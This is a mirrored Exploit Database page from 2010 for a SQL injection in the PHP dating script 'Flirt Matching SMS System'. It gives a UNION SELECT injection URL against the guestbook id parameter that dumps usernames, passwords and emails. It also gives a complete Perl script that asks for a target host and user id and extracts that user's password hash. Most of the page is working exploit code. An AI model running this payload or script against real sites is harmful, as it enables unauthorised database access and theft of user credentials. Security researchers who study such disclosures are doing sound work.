Flirt Matching Sms System – SQL Injection

• Exploit Database
• 100 阅读

• 作者： Easy Laster
  日期： 2010-03-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11885/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98

  ----------------------------Information------------------------------------------------ +Name : Flirt Matching SMS System <= SQL Injection Exploit +Autor : Easy Laster +Date : 26.03.2010 +Script: Flirt Matching SMS System +Download : ------------------ +Demo : http://phpspezial.de/singel/ +Price : 39,99€ +Language :PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne.   --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|_|___ ___|_|___ ___| |_ |_| | | | |_|___|_ -| -_|_| | |_| |_| | |___| __|_| . | | | -_|_|_| |_|___|___| |_| |___|___|___|___|_| |_|_| |_| |__||_| |___|_| |___|___|_| |___| |___|     ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/flirt/index.php?site=guestbook&id=   +Exploitable : http://www.site.com/flirt/index.php?site=guestbook&id=9999999999+union +select+1,2,3,4,concat(id,0x3a,username,0x3a,password,0x3a,email),6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from +users+where+id=1   -----------------------------------------------------------------------------------------   #SQL Injection Exploit   #!usr\bin\perl # # ################################################## # Modules# #------------------------------------------------# use strict; # Better coding. # use warnings; # Useful warnings. # use LWP::Simple;# procedureal interface# ################################################## print " ################################################## #4004-Security-Project # ################################################## #Flirt Matching SMS System SQL Injection # # Exploit# #Using Host+Path+Userid# #www.demo.com /flirt/ 1# #Discovered and vulnerability by Easy Laster # #coded by Easy Laster# ################################################## \a\n"; my($host,$path,$userid,$request); my($first,$block,$error,$dir); $block = " ##################################################\n"; $error = "Exploit failed"; print "$block"; print q(Target www.demo.com->); chomp($host =<STDIN>); if ($host eq""){ die "$error\a\n"}; print "$block"; print q(Path /path/ ->); chomp($path =<STDIN>); if ($path eq""){ die "$error\a\n";} print "$block"; print q(userid->); chomp($userid =<STDIN>); if ($userid eq""){ die "$error\a\n";} print "$block"; $dir = "index.php?site=guestbook&id="; print "<~> Exploiting...\n"; $host = "http://".$host.$path; print "<~> Connecting...\n"; $request = get($host.$dir."9999999999+union+select+1,2,3,4,concat(password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+users+where+id=".$userid."--"); $first = rindex($request,"Gästebuch von"); if ($first != -1) { print "<~> Exploiting...\n"; print "$block\n"; $request = substr($request, $first+14, 34); print "<~> Hash = $request\n\r\n\a"; } else { print "<~> $error"; }